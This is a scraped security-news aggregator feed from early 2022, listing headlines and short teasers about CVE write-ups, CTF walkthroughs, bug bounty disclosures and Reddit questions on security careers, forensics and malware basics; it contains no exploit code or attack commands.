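    Tophant (斗象科技) named to the "Top 10 Security Services" among outstanding cybersecurity companies of 2021
    Successfully selected and awarded the "Top 10 Security Services" title
    2021 National Mobile Application Security Observation Report
    At present, China's cybersecurity situation remains severe; in the era of big data, cybersecurity faces a range of risks including virus threats, online fraud, hacker intrusions and information loss.  ( 1 min )
    2021 Business Risk Control Insight Report officially released
    An in-depth analysis of typical fraud scenarios and cases in 2021 across three dimensions: business security, content security and cross-border security.
    FreeBuf Morning Report | Russia's central bank proposes banning cryptocurrency; hackers implant malware in UEFI firmware
    A new survey shows that the number of cyberattacks against companies around the world has increased by 15% over the past three years.  ( 1 min )
    Security Construction and Security Operations under Cloud-Native Architecture, Viewed through Major Vulnerability Response (Part 1)
    A summary of emergency response to major vulnerabilities and building security capabilities driven by security operations  ( 1 min )
    A Brief Discussion of PHP Pseudo-Protocols
    PHP has many wrapper protocols; the most common include the file, php, data, zip and phar protocols.  ( 1 min )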
  • Open

    Forge HackTheBox Walkthrough
    Introduction Forge is a CTF Linux box rated “medium” on the difficulty scale on the HackTheBox platform. The box covers subdomain enumeration, SSRF attacks and The post Forge HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

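    CVE-2021-33742: Analysis of the Internet Explorer MSHTML Heap Out-of-Bounds Write Vulnerability
    Author: Topsec Alpha Lab (天融信阿尔法实验室) Original link: https://mp.weixin.qq.com/s/nfPm0B2Z9dTodsw-VTUxpQ 1 Vulnerability background: On July 14, 2021, Google's Threat Analysis Group (TAG) published an article titled "How We Protect Users From 0-Day Attacks". The article disclosed the 2021 Google Threat...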
  • Open

    No length on password
    Imgur disclosed a bug submitted by blackfly_: https://hackerone.com/reports/1411363 - Bounty: $250

  • Open

    mimikatz LogonPasswords and usernames with dollar sign ($) at the end
    I have a lab that I'm testing mimikatz on. Some of the usernames are dumped as "hostname$" What does that mean? hostname being the actual host name of the test server being in this case "labserver"; so it will be something like: [...] kerberos : * Username : labserver$ * Domain : lab.corp * Password : P@ssW0rd!! submitted by /u/ak_z [link] [comments]  ( 1 min )
    [Malware] I've started studying malware and more specifically backdoors, but something seems to not make any sense.
    Hey, I've recently started to study how backdoors work and are used / made. But I've noticed that every backdoor I've come across follows this principle: A client runs on the target and tries to connect to the attacker to give him access. The server runs on the attacker and waits for a connection from the target. Shouldn't this be the opposite so the attacker can gain access whenever he wants? Isn't the purpose of a backdoor to be an easy way for the attacker to come back later? If so doesn't it defeat it? Am I misunderstanding something? I hope someone can help me clarify this. PS: I'm not asking this to commit any sort of crime, I'm genuinely interested in cybersecurity research and that's why I'm asking this question. submitted by /u/fleurdelys- [link] [comments]  ( 2 min )
    Which do you think is the higher tier in cyber security?
    Soc analyst or security analyst? submitted by /u/lowkiwatchingyou [link] [comments]  ( 1 min )
    Weak password found on "accident"
    Backstory for question: I'm currently in the process of getting a job and I was sent a link (via email) to a psychological test which required a username and password to login, the user was already typed for me (sent as parameter on the url) and the password was sent on the email. At first I didn't read the full email so I entered the link and when I saw I needed a password, I thought that there must've been a mistake, so I typed a "random" password to see what would happen (I typed the same user as the pass) and I was able to log in. I was very confused as I was greeted with a page full of information regarding the account I was logged in to and as I explored further I was able to see personal information regarding other people that have done the quiz. At this point I realized that I wasn't supposed to be able to read this info so I logged out and tried another password (I was thinking that maybe the account accepted everything you typed) but no, I got a "wrong password" text. I read the email again, this time I saw that the password I was supposed to use was always there, I try it and I log in successfully, but now it doesn't redirect me to the admin panel, it takes me to the psych test I'm supposed to be doing. As a NetSec Student, I know that I should let the company know about this weak password, but I don't know how to do it without it looking like I was on purpose trying to log in with another password different than the one provided via email and maybe get in trouble with the company I'm applying to. Worded as a question: What is the best way to let a company know that they have a vulnerability on an account? TL;DR: Got sent user and pass for an account, tried same user as pass instead (because I'm dumb and didn't read full email) and logged in as admin. Want to disclose this to the company but don't want to get in trouble. submitted by /u/Emacholo [link] [comments]  ( 3 min )
    Advice on a DAST Tool to Handle Single Page Apps
    Hi everyone, I’m currently looking for a DAST scanner that works well with single page applications (I’m using Ember.js with a couple of APIs behind it). For example, every tool I’ve tried has not been able to effectively test for XSS, as they can’t link injection points from API calls back to the rendered DOM on the monolithic front end. Any tools, advice, etc. would be so greatly appreciated. Also, please note that I already utilize SCA and SAST, and will be moving to IAST in the future – this is solely about DAST. Cost is not a concern, just effectiveness. submitted by /u/shadowcorp [link] [comments]  ( 1 min )
    Jumping from Application Developer/DevOps to Application Security Engineer
    Hey everyone, I'm 27, relatively new into tech (4 years of experience). I'm a full stack developer, experienced with DevOps and CI/CD pipelines, and I have a CISSP. My goal is to ultimately become a jack of all trades architect. I'm potentially getting an opportunity to move into an application security engineering role that has significantly less development, and a lot more threat modeling, security architecture, pen testing, etc. I've never done those things, I've only studied them. Is it worth it to switch into a much more high level security oriented position? Would I be abandoning my primary skill set? Or is there a way to combine the 2 down the line? I'd love to hear your experience, your advice, and how your own career grew. submitted by /u/pyscho94 [link] [comments]  ( 1 min )
    Strange unknown local device found when running Wireshark and filtering via ARP
    Hi, I apologize in advance if this does not fit this subreddit. I was running wireshark on my home network and was filtering by ARP to test some things. But in the process I found a strange device with a Facebook MAC address. https://imgur.com/a/HbNuWdE (note, I removed the MAC for the router) It was only the router asking for IP and not vice versa. Why would the router ask for it in the first place? Any info/explanation would be appreciated. submitted by /u/Wattcat [link] [comments]  ( 1 min )
    Career pivot!
    Looking to pivot to the cyber security world. Studying for a sec + cert, have a secret clearance, and got a cyber cert from MIT. Have 2 years of DOD consulting experience. And an engineering degree. Looking at roles like “cybersecurity engineer” and cybersecurity analyst. What kind of compensation can I expect as a government contractor with the above resume? I’m looking to get into the RMF/Policy/Vulnerability Assessment world. I am trying to create a future path for myself down the road. submitted by /u/tbrady1001 [link] [comments]  ( 1 min )
    Making the jump from IT Support to Security - Advice needed
    Hello, Looking to move into IT Security from IT Support. I currently have 15+ years in IT Support (1st, 2nd, 3rd line IT support). Unfortunately I'm pretty clueless on progression steps and the certs needed to climb up the Security ladder. I don't like the idea of CISSP as that appears to be geared towards management, but like the look of Security Analysis/Defensive/Offensive. With my IT background what certs should I look at? I was thinking GCIH as a start? Also would 2 years as a Security Analyst with a couple of certs be enough to progress in a new company? Or would 5 years (for example) be the minimum I would realistically need? Any advice/insight would be appreciated and apologies if this is the wrong forum. submitted by /u/ZoidbergsMinions [link] [comments]  ( 5 min )
    Security for Personal IT Tutor
    Hi, I’m getting increasing requests from friends of friends of family to do some basic IT support work for them. With close family members I have been entrusted with access to their password managers and unattended remote access, which is really useful to be able to help with things they can’t do themselves or when they’re away from their devices - all the credentials for this are kept in a totally separate password manager from my personal accounts. However I recognise that this is big security risk, and if I’m going to be working with people outside my family, I want to avoid exposing them to unnecessary risk without severely limiting my ability to help them. What should I be conscious of in setting up a remote access solution for this purpose? Are there any good ways that clients can share passwords or access to specific accounts without me having access to their entire password manager? submitted by /u/marquitanavin [link] [comments]  ( 1 min )
    Temporal Scoring - CVSS How to Input
    So right now I am using CVSS v3.0 base scoring to calculate severity of findings from scanning tools like Tenable.sc, snyk, and some other tools. I want to go farther and factor the CVSS Temporal score into the severity so I can prioritize better... question is how do I do that when I have 1,000+ findings and can't do it manually? Where can I get a feed or service or point in time data to get that? NVD does not provide it. Thank you! submitted by /u/ThrowThrowAway789 [link] [comments]  ( 1 min )
  • Open

    A new shellcode injection methodology
    submitted by /u/Idov31 [link] [comments]
    Binary-only fuzzing with Python, QEMU and LibAFL
    submitted by /u/domenukk [link] [comments]
    Doing a uni project on pen testing and appreciated this article for help writing up an information disclosure vulnerability. Thought some of you might appreciate it too.
    submitted by /u/PlatonicDogLover93 [link] [comments]  ( 1 min )
    Backdoor Found in Themes and Plugins from AccessPress Themes (CVE-2021-24867)
    submitted by /u/ScottContini [link] [comments]
  • Open

    The Threat Landscape and Attribution
    Over the years, changes in the threat landscape have made attribution more difficult. Attribution has always been challenging, but has been and can continue to be eased through visibility. That is, if your view into an event or campaign is limited to resources such as malware samples pulled from public repositories, then attribution can be challenging. Even adding information regarding infrastructure extracted from the sample configs can still give a somewhat limited view. However, as visibility is expanded to include data from intrusions and incidents, attribution becomes clearer and more granular. I ran across A Complex Threat Landscape Muddles Attribution recently and found it to be a fascinating, insightful read, one that anyone involved in threat intelligence, even peripherally, shoul…  ( 8 min )
  • Open

    Wildfire videos - wireless research UCSD
    The High Performance Wireless Research and Education Network (HPWREN), a University of California San Diego partnership project led by the San Diego Supercomputer Center and the Scripps Institution of Oceanography's Institute of Geophysics and Planetary Physics, supports Internet-data applications in the research, education, and public safety realms. HPWREN functions as a collaborative, Internet-connected cyberinfrastructure. The project supports a high-bandwidth wireless backbone and access data network in San Diego, Riverside, and Imperial counties in areas that are typically not well-served by other technologies to reach the Internet. This includes backbone locations, typically sited on mountain tops, to connect often hard-to-reach areas in the remote Southern California back country. http://hpwren.ucsd.edu/HWB/ submitted by /u/inoculatemedia [link] [comments]  ( 1 min )
    Indiana Department of Homeland Security Fire Regulation Variance Requests
    submitted by /u/Typographical_Terror [link] [comments]  ( 1 min )
    Books on Theorists of Education [PT-BR]
    submitted by /u/afmachado [link] [comments]
  • Open

    Tracing Tor router connections within a host
    Hi there, I'm analysing a memory dump from an infected system that is running a cryptominer and connecting to the mining server through a Tor router. I know the processes of the miner and the tor router it installed on the system. Is there a way to show the miner handing over the IP of the actual mining server to the Tor router? The firewall of course just sees the connection to the next Tor router. submitted by /u/NazgulNr5 [link] [comments]  ( 1 min )
    What are some jobs that you can do with experience in computer forensics?
    I have a very close friend who has been doing computer forensics for well over 10 years and has experience with networking technology too. They've been working for local law enforcement all this time and have had to deal with "very bad sexual content" for quite a long time and it's really starting to eat away at their mental health. They really would like a job change. They are willing to work in law enforcement as long as the work doesn't involve kids. They make good money at the police department they work at now so a part of the equation is a paycheck. They are hoping to work at this job for the rest of their career. Teaching would also be an option. Thanks for any answers. submitted by /u/Onece_in_a_life_time [link] [comments]  ( 3 min )
  • Open

    Process Ghosting Attack
    Introduction Gabriel Landau released a post on Elastic Security here which talks about a technique through which antivirus evasion was found to be possible. The The post Process Ghosting Attack appeared first on Hacking Articles.  ( 8 min )
    Corrosion: 2 VulnHub Walkthrough
    Proxy Programmer’s Corrosion: 2 is a Vulnhub medium machine. We can download the lab from here. This lab is designed for experienced CTF players who The post Corrosion: 2 VulnHub Walkthrough appeared first on Hacking Articles.  ( 6 min )
    Intelligence HacktheBox Walkthrough
    Introduction Intelligence is a CTF Windows box with difficulty rated as “medium” on the HackTheBox platform. The machine covers OSINT, AD attacks, and silver ticket The post Intelligence HacktheBox Walkthrough appeared first on Hacking Articles.  ( 7 min )
  • Open

    My Pentest Log -4-
    Greetings from Constantinople to all, Continue reading on Medium »  ( 2 min )
    Creating easy proof-of-concept scripts with Python and Curl.
    Hello Hunters! Continue reading on Medium »  ( 3 min )
    PORTSWIGGER WEB SECURITY - XSS (CROSS SITE SCRIPTING) LAB SOLUTIONS
    Cross Site Scripting: as a result of malicious commands that an attacker runs in a web application… Continue reading on Medium »  ( 32 min )
    Fuzzing is always fun..!!
    Hello Everyone, Continue reading on Medium »  ( 2 min )
    Setting up a Free VPS for Bug Bounty & More
    Finding Bugs can be Time consuming and as for day-to-day life, you are not sitting on your one computer all day unless you are a… Continue reading on Medium »  ( 3 min )
    How I was able to find multiple vulnerabilities of a Symfony Web Framework web application
    Found high severity vulnerability just from reconnaissance. Found multiple vulnerabilities on a web application that used the Symfony web… Continue reading on Medium »  ( 2 min )
  • Open

    Show HN: TypeScript Scenario-Based Web Application Fuzzing Framework
    Article URL: https://github.com/shfz/shfz Comments URL: https://news.ycombinator.com/item?id=30047196 Points: 1 # Comments: 0  ( 4 min )
  • Open

    SecWiki News 2022-01-23 Review
    No news updates yet today. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

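    Is your home Wi-Fi secure?
    Is your home Wi-Fi secure? Could someone be freeloading on it, or could a hacker log in and steal data?  ( 1 min )
    Common in-domain operations, condensed edition
    Once we have penetrated an internal network, we need to quickly determine the environment we are in and decide how to proceed next. This article introduces these operations very concisely  ( 1 min )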
  • Open

    Intigriti’s January XSS challenge By TheRealBrenu
    First challenge for 2022 is here by TheRealBrenu. This one is a good example of javascript source maps, which I was unfamiliar at first… Continue reading on Medium »  ( 3 min )
  • Open

    OSINT Double Trouble
    It’s a new year, and that means new OSINT Challenges to solve. This time around, I’ll be solving 2 challenges courtesy of Twitter’s… Continue reading on Medium »  ( 4 min )
  • Open

    Cracking Kubernetes Network Policy
    TL; DR This post digs into the Kubernetes NetworkPolicy model, then designs a policy enforcer based on the technical requirements and further implements it with less than 100 lines of eBPF code. Hope that after reading through this post, readers will get a deeper understanding on how network policies are enforced in the underlying. Code and scripts in this post: here. TL; DR 1 Introduction 1.1 Access control (NetworkPolicy) in Kubernetes 1.2 How policies could be enforced in the underlying? 1.3 Purpose of this post 2 Design a dataplane policy enforcer 2.1 Introducing service identity 2.2 Introducing identity store: Labels Identity 2.3 Introducing policy cache 2.4 Introducing IPCache: PodIP -> Identity 2.5 Hooking and parsing traffic 2.6 Compose up: an end-to-end workflow 3 Imp…

  • Open

    I'm working in security and stuck on whether I should learn Web Development
    Hi Everyone, I currently work in Cyber security (Cryptography specialist) for a large organization. However, I have minimal coding experience. I would like to start the Odin Project but I'm not sure if I should invest all that time in learning web dev or continuing a path in security with something like a CISSP for more security knowledge. The odin project inspired me because I want to create custom blogs/websites of my own at some point but I do know it might halt my security knowledge progression and I know I can't balance learning both right now. Will having both skills be better than just having one? If anyone has another suggestion that would be better I am open to that as well. The odin project inspired me because I want to create custom blogs/websites of my own at some point but I do know I have a lot to learn in either path I choose. Thank you in advance. submitted by /u/Early_Ad_1861 [link] [comments]  ( 3 min )
    Backdoor payloads in image files: is this a thing?
    If I open an image in gmail (I think it opens through their viewer), can the payload run? Should I be concerned? Is just viewing it sufficient or would I have to download it? submitted by /u/anon314159265358p [link] [comments]  ( 1 min )
    Does anyone know what these photos/files are from the Brave browser folder?
    There were also some manifest.json's that had information like ""name":"Brave NTP sponsored images"", "Brave NTP sponsored images", "Tezos", "Taxbit" in them. Are these preloaded files for ads for a cryptocurrency/NFT manager that's placed somewhere in Brave intentionally? They were listed in a folder that looked like gibberish: "ghjifhoinncdowgrhioybqpasjndavbaoba" as an example. https://imgur.com/a/zozye1B I don't have to worry about some kind of "secret" cryptominer like Norton recently added to their software right? (I hope that this is the case and it's just files for ads). submitted by /u/nekohideyoshi [link] [comments]  ( 1 min )
    ISO 27001 Lead Auditor Certification
    Hey everyone. So I’m planning on doing the ISO 27001 LA certificate and came across it being offered by multiple certification body such as TUV, BSI and PECB. Can anyone tell me what the difference is between the certification bodies as I see a drastic price difference. Thanks in advance. submitted by /u/reeds1164 [link] [comments]  ( 1 min )
    What is the best entry level Linux certification?
    Hey everyone! Thank you for stopping by my post. I was wondering what is the best entry level Linux certification. I understand that the Linux+ and LPIC-1 are no longer a 1 for 2 package. Then everything I read online says don’t go for either of these and look into getting a Red Hat certification. I am going down the security engineer road and just need to get much deeper into Linux than I currently am. What are your recommendations and thoughts on Linux certifications? submitted by /u/RedNeckHutch [link] [comments]  ( 3 min )
    What can work computers/IT have access to?
    Assume you have a work laptop given to you with a remote software that’s installed to give IT monitoring and troubleshooting access. What are some best practices for separating your work and personal stuff when using the work laptop? Should you avoid logging into things like your personal google account, Bank accounts, etc? Does this make it possible for someone in IT possibly with bad intent to also have access to your other devices in your network? If so, best practices to avoid such breaches? I assume you never want to login into your other computers shared drives from your work computer which will give access to every file on your personal computer that’s shared. I’m curious what is the extent of monitoring that a normal corporate workplace does on the computer? I always assumed they can see my screen at any time, all key strokes are logged. But this makes me uncomfortable in the event that there’s a breach, hack, or bad employee who can cause lots of damage. Thoughts on this matter? Anyone familiar with kaseya software for monitoring? submitted by /u/RasAlTimmeh [link] [comments]  ( 1 min )
  • Open

    Beginner Bug Bounty Guide - Part 2
    Previous: Beginner Bug Bounty Guide - Part 1 Continue reading on Medium »  ( 1 min )
    Bug Fix Update: TribeOne dApp is Ready to Take NFT Space by Storm
    Our dApp is getting closer and closer to perfection as we work hard to achieve the best possible user experience. Continue reading on Medium »  ( 2 min )
    Kenobi Walkthrough | TryHackMe | Explained | Part 1
    Goals: Enumerate Samba for shares, manipulate a vulnerable version of proftpd Continue reading on Medium »  ( 3 min )
    Malicious file upload leads to off-domain XSS
    Hello Everyone, Continue reading on Medium »  ( 1 min )
    Demystifying JA3: One Handshake at a Time
    Recently, I was browsing a website with BurpSuite and found out that the website was blocking my requests. In the pursuit of unlocking the… Continue reading on InfoSec Write-ups »  ( 6 min )
  • Open

    GoWard - A robust Red Team proxy written in Go
    submitted by /u/UnwearableCactus [link] [comments]
    CVE-2021-45467: CWP CentOS Web Panel – preauth RCE
    submitted by /u/Gallus [link] [comments]
  • Open

    Case in modern communist destabilization of Ukrainian-Poland relations
    Case provides overview of 5 year long activity of former Ukrainian citizen in Poland, conducting provocations and communist propaganda in… Continue reading on Medium »  ( 13 min )
    Quiztime — Random OSINT Challenge 5
    On Jan 14, 2022, Quiztime (contributor @dondude) shared a new OSINT quiz with us. The objective was fairly simple. We had to figure out… Continue reading on Medium »  ( 3 min )
    OSINT Challenge — On the road to Estonia
    In December 2021 the OSINT Dojo invited the community to solve a traditional image-based geolocation OSINT challenge. They have asked for… Continue reading on Medium »  ( 2 min )
  • Open

    SecWiki News 2022-01-22 Review
    No news updates yet today. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Buffer Overflow in optimized_escape_html method
    Internet Bug Bounty disclosed a bug submitted by chamal: https://hackerone.com/reports/1455248 - Bounty: $1200
    xss reflected on imgur.com
    Imgur disclosed a bug submitted by whoami991: https://hackerone.com/reports/1058427 - Bounty: $100
  • Open

    Android Pentesting-Intents
    When doing black box pentesting for Android, apart from looking at root detection bypass and SSL pinning, looking for intents are also… Continue reading on Medium »  ( 2 min )
  • Open

    A collection of 8mm family videos from the 60's that have been digitized and restored
    submitted by /u/HGMIV926 [link] [comments]  ( 3 min )
  • Open

    OSS authors: “We need to understand your mitigation plans for this vulnerability”
    Article URL: https://twitter.com/bagder/status/1484672924036616195 Comments URL: https://news.ycombinator.com/item?id=30035651 Points: 68 # Comments: 11  ( 1 min )
    CVE-2022-0185: Detecting Linux Kernel vulnerability causing container escape
    Article URL: https://sysdig.com/blog/cve-2022-0185-container-escape/ Comments URL: https://news.ycombinator.com/item?id=30034914 Points: 18 # Comments: 0  ( 5 min )
  • Open

    CVE-2021-45467: CWP CentOS Web Panel – Preauth RCE
    Article URL: https://octagon.net/blog/2022/01/22/cve-2021-45467-cwp-centos-web-panel-preauth-rce/ Comments URL: https://news.ycombinator.com/item?id=30035247 Points: 1 # Comments: 0  ( 3 min )
  • Open

    Demystifying JA3: One Handshake at a Time
    Recently, I was browsing a website with BurpSuite and found out that the website was blocking my requests. In the pursuit of unlocking the…  ( 6 min )
  • Open

    Employee Access to Data
    This is largely for those who work in, have worked in, or have worked with a SOC. For this example, there is a SOC that has tiers of analysts, with lower level analysts performing basic tasks and escalating alerts to the upper level analysts. The lower level analysts serve more of a traffic cop type of role; they weed out the easily spotted false-positives and may start very basic reviews of true positive events before handing off to the higher level analysts for analysis. In this setup, all members of the SOC have full access to M365 (all mailboxes, all OneDrives). This is in addition to the ability to triage machines via an EDR tool and collect files through that tool. My question: is that type of access appropriate for the lower level analysts? The obvious concern is that it is excessive data for the role they are performing (including any especially since the position has fairly high turnover. What are your thoughts? submitted by /u/ebarboza311 [link] [comments]  ( 2 min )
    digital forensics software bypass encryption
    How does forensics software extract files from password protected iPhones? submitted by /u/thecirclingfly [link] [comments]  ( 1 min )
    Old iphone se
    I have an old iPhone SE, I think. Somebody tried logging in a bunch of times and locked out forever basically. So I connected to iTunes and it told me to update it so I did just in case it gives me a chance to try again and now it says phone unavailable. And not lock screen. So am I screwed because it's extremely important to get the videos and photos from there. submitted by /u/TushieandTush [link] [comments]  ( 1 min )

  • Open

    CVE-2022-0185: Detecting and mitigating Linux Kernel vulnerability causing container escape
    submitted by /u/MiguelHzBz [link] [comments]
    The best free, open-source supply-chain security tool? The lockfile
    submitted by /u/pabloest [link] [comments]  ( 1 min )
    Captain Hook - How (not) to look for vulnerabilities in Java applications
    submitted by /u/Gallus [link] [comments]
  • Open

    I need an advice
    Hi, I can choose among 3 internships as a computer science student. I really want to land a job in cybersecurity but right now I need to build up my CV and finish my degree. The 3 internships are: Automation Software Engineer (you have to validate portions of software implementations for Communication Service Providers based on established engineering principles and in accordance with provided specifications and requirements, help evolving our telecommunication focused product, build demonstrations of product use cases help to prepare collaterals to explain technical product capabilities, software architectures and features, build automated test scripts to analyse test data to verify requirements compliance) Internship Program for Information Science or Telco Engineer (you have to participate to a project delivery for assigned tasks, that may include performing analysis and design of a IT or Telco Solution, SW Development, systems configurations, troubleshooting systems errors/problems, monitoring and/or testing systems performance, and contribute to the design of technical solutions for customer environments, work under supervision of technical lead and with customer nominated representatives to accomplish assigned tasks) Automated Assurance Artificial Intelligence & Machine Learning Engineer (validate portions of software implementations for Communication Service Providers based on established engineering principles and in accordance with provided specifications and requirements, develop and extend the coverage of current test automation, build automated test scripts to analyse test data to verify requirements compliance, work on small independent software and system integration projects to augment internal work). As you can see they are intertwined, but I would guess the 2nd one could be more cybersec-oriented (for the telco part). What do you think? Any advice is appreciated. submitted by /u/Danyderossi [link] [comments]  ( 2 min )
    Switching From IT Audit
    Hello, I work in IT audit and I would like to have a more operational/hands-on role within an IT department. The problem is that I don't have any experience dealing directly with IT work. How would you recommend I go about transitioning from IT audit to a more technical role? Any certifications or skillsets you would recommend I obtain? I was thinking IT Security would probably be the best fit, given most of my audits are involved with IT security, patch management, or mobile device security. submitted by /u/DapperDandy22 [link] [comments]  ( 1 min )
    Payloads in Word/PDF documents: Is this still a thing?
    I read about this being used to hack computers recently. Are most computers still vulnerable to this? Payload=malicious file that could potentially create a backdoor that runs in the document when you enable macros (most people are not cognizant of this possibility). An article I read tested this successfully on a Windows machine running Outlook that defaulted to Adobe to read the PDF. I noticed in GMail that docs and PDFs aren't opened on the computer, but read in a window. Does this prevent payload execution? Anyways, I'd like to know if this is still a thing and why? Why can't Adobe or Microsoft build their applications to not allow this? submitted by /u/anon314159265358p [link] [comments]  ( 3 min )
    Red team Operator to security strategy consultant
    Hi all, I am currently working for a big four firm (US) as a red team member. I am thinking to switch to the broader sense of security to see more parts such as security strategy/security officer/architect roles. Many people see red teaming as the most fun job & I agree it is awesome. However, Red team is only a small part of the equation. Who has made the leap and switched to a strategy role as a pentester/red team? What was your experience in the new role? submitted by /u/TechnicalCiso [link] [comments]  ( 2 min )
    Taking on new role as Security Architect. Advice? Tips? Considerations? Anything welcome!
    As the title states, taking on a new role as a Security Architect for a predominantly Windows hybrid cloud/on-prem environment that hosts quite a few web servers. I am very comfortable with the deployment and configuration of hardened endpoints, SIEMs (Splunk & ELK), network segregation, backup and restoration, and authoring most relevant policy and procedure as it relates to NIST 800-53. My understanding is that I am one of 2 "cybersecurity" specialists and will be responsible for documenting, developing, and configuring the entire security architecture from the ground up. I've been told that MFA has been enforced at 100% compliance. I am not however familiar with securing a hybrid environment, and don't have a ton of experience managing firewalls. How should I approach the discovery/recon aspect of becoming familiar with a new network? After getting my bearings and a detailed depiction of the current architecture, I plan to first tackle the backup and restoration processes to ensure ransomware resistance. Then address any glaring weak points. Anything to help a brother out? submitted by /u/UnderZinfluence [link] [comments]  ( 4 min )
    Likelihood of embedding malicious code in music streaming services?
    To the Red Teamers: imagine this, I use a music streaming service, I have some playlists that me and my friends collaborate on, this playlist has "automatic download" enabled so whenever a track is added it is also automatically downloaded to my device. Now take this further, you embed malicious code in tracks, and upload them to the music service, and then my friend adds this track with malicious code to the playlist, and bam! I got the file on my systems. Now add the fact that when you open a playlist to collaboration, it opens this playlist for everyone to add tracks. Sure, to hack the major providers of this service is going to be hard, but the small band/label/producer that uploads the tracks to the service, classic supply chain. And the bad actor can just browse around for open playlists and add these "bad" tracks and now you got the file to the device. So to what degree is this a likely attack vector? Is it at all feasible? Because you got plenty of versions for different OS with likely exploits available. I at least was quite surprised to find a playlist of mine, with a lot of new music I didn't recognize for a user I had not shared my playlist with, and was sitting at work and thought, "this is most likely an overlooked tool to use". So should one be worried about these "auto sync/download", a bit like Dropbox, but here it is open to everyone/the world. At least I block the unsanctioned cloud storage services, while permitting the web part at work, so when you download stuff via web it's scanned and checked by our EDR, where I worry about the apps with auto sync and all that. So should I block Spotify, Tidal, SoundCloud [insert service here] apps as well? submitted by /u/Uli-Kunkel [link] [comments]  ( 3 min )
    Startup Asking for SSN in a Google Form
    I worked for a small startup during the summer of 2021. There were several things that came up during the internship that made me feel the company was not one that I would stand behind, and they didn't know what they were doing. They paid me hourly, but they never set up an employment contract that they promised. They never collected my tax info. Suddenly, within the last two days they have sent me several messages asking me to fill out a Google Form so they can complete the 1099s. The form is just straight up all the most sensitive information: full legal name, address, email & phone, SSN. (1) I'm not sure how secure it would be to send an SSN over a Google form, so I haven't done it yet. (2) I know that the form will result in a Google sheets that has all of the employees' info, and I'm not sure if the company will keep that secure or delete it, but it weirds me out thinking that there might indefinitely be a Google form out there with my SSN and other personal info, and they'll forget about it when the company inevitably goes defunct. (3) I'm not sure what other secure method I can suggest, to get them this information so they can send the 1099. submitted by /u/ImpressiveAirport4 [link] [comments]  ( 2 min )
    Anyone surprised about the lack of fundamental knowledge in network security? Not enough forward engineering knowledge it seems.
    There seems to be a surprising lack of fundamental knowledge in network security. Has anyone else felt the same? Here are some examples working with different teams: Work heavily with Kibana servers, but lacked fundamental database knowledge. You would think someone managing clusters would at least understand the basics of distributed systems. Heavily use SIEMs, but could not tell you what the concept of an operating system process is beyond "Yeah, it's a program that executes." A serious lack of web development knowledge. A lot of people entering the field claiming they are knowledgeable in network security, but can't forward engineer a basic CRUD app, and yet they'll claim they know how to reverse engineer it and secure it. Yeah, you're able to successfully complete a basic SQL injection hackthebox, but you could barely construct a SQL query yourself. You just blindly put in a SQL query and hope you get back an error saying the web application is vulnerable and then blindly put in another SQL query. submitted by /u/me_hungry_and_sad [link] [comments]  ( 4 min )
  • Open

    Cyber Investigator OSINT CTF “Cyber Crime” Writeup
    The Cyber Society at Cardiff University runs the Cyber Investigator CTF, a free CTF with OSINT and forensics challenges. Continue reading on Medium »  ( 4 min )
    First Blog…
    This is my first ever blog. Blogging is not something I ever thought I’d end up doing, but to obtain #OSINTDojo ranks & badges there are… Continue reading on Medium »  ( 6 min )
    Urgent! Poles threaten well-known journalist Igor Isaev!
    Well-known Zaporizhzhia journalist Igor Isaev is being threatened with 3 years in prison in Poland. Who did this? Continue reading on Medium »  ( 10 min )
    Windows Shell — Discovery Stage
    Sometimes you don’t always need a Meterpreter shell. Depending on the intent, Netcat might be all you need. The benefit being that Windows… Continue reading on Medium »  ( 5 min )
    Using Open Source Intelligence (OSINT)
    Recently, Netflix’s ‘The Great Hack’ has sparked a lot of interest around data privacy. The documentary covers Cambridge Analytica and how… Continue reading on Medium »  ( 7 min )
  • Open

    hosted.weblate.org display of unfiltered results
    Weblate disclosed a bug submitted by joshmcman08: https://hackerone.com/reports/1454552
    Email change or personal data change on the account.
    Stripe disclosed a bug submitted by dk82hg: https://hackerone.com/reports/1250037 - Bounty: $3000
    [https://app.recordedfuture.com] - Reflected XSS via username parameter
    Recorded Future disclosed a bug submitted by bombon: https://hackerone.com/reports/1201134 - Bounty: $300
    disclosing clients' secret keys https://stage-uapi.tochka.com:2000/
    QIWI disclosed a bug submitted by rivalsec: https://hackerone.com/reports/1419205 - Bounty: $150
  • Open

    Duplicating USB drives
    Good day all, I feel my question is on the border of Computer forensics, but I believe still pertinent. I do not come from a background in IT, and have been figuring this all out on my own in the past few years. I have acquired a set (x3) of USB drives to collect images and videos from clients' phones in an easier way. I have added the exact nomenclature of what I have below. I need this to be done in a forensically sound manner, and I am currently going through the steps to validate my theory these collect data in a forensically sound manner. To be forensically sound any media should be "zeroed" or wiped prior to use. Herein lies my question. With these flash drives they obviously have some sort of proprietary software which makes them work. If I were to format these I would lose this proprietary software. What would be a way I could format these drives and then return them to "manufacturer settings"? I have looked into USB duplicators, not sure if this could be a forensically sound option. Also, they seem too expensive to acquire for my organization currently. USB in question: MFi Certified 128GB Photo-Stick for iPhone-USB-Flash-Drives External Storage Stick for USB C iPhone-Thumb-Drive Memory-Mobile-for-Android-Phones iPad-Flash-Drive Photo Transfer Stick submitted by /u/Unfair-Border8865 [link] [comments]  ( 3 min )
    Unexplained WAN traffic to private subnet ranges
    While investigating a remote intrusion warning I noticed HTTP traffic from two separate devices communicating with private IP subnet ranges that do not belong to any of our routers, or other devices. All of the traffic is to port 80. Example IPs include: 10.50.60.15 10.80.80.112 209.54.181.102 All the above are reserved private ranges and the aforementioned traffic was observed on two different routers, but using the same Verizon modem. Anyone seen this before, or can explain? There are no VPNs in use, or similar service. Log submitted by /u/keeny-fn-pawers [link] [comments]  ( 1 min )
    SQLite query repository?
    Does anyone know of any repositories (sites, blogs, etc) where people can post and look for SQLite queries? There are times when the best tools in the world can’t parse what you want and I thought it would be a great resource if there were queries others had done and shared cataloged somewhere. If you know of any, or any good sites, drop them below! submitted by /u/acw750 [link] [comments]  ( 1 min )
    Forensic script ideas?
    Hello all, I have no programming experience, I can use command line and get around in Linux but I would like to make practical things the community would find useful. There are so many good scripts and tools out there but what is a missing tool that you would like to have? I would like to build the script/program in Python, Go or C#. I am looking for some ideas that you think a beginner would be able to tackle that would have some value to others. submitted by /u/AgitatedSecurity [link] [comments]  ( 2 min )
  • Open

    SecWiki News 2022-01-21 Review
    Automated penetration testing: an in-depth analysis of the DeepExploit framework, by ourren. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Simple CTF- TryHackme
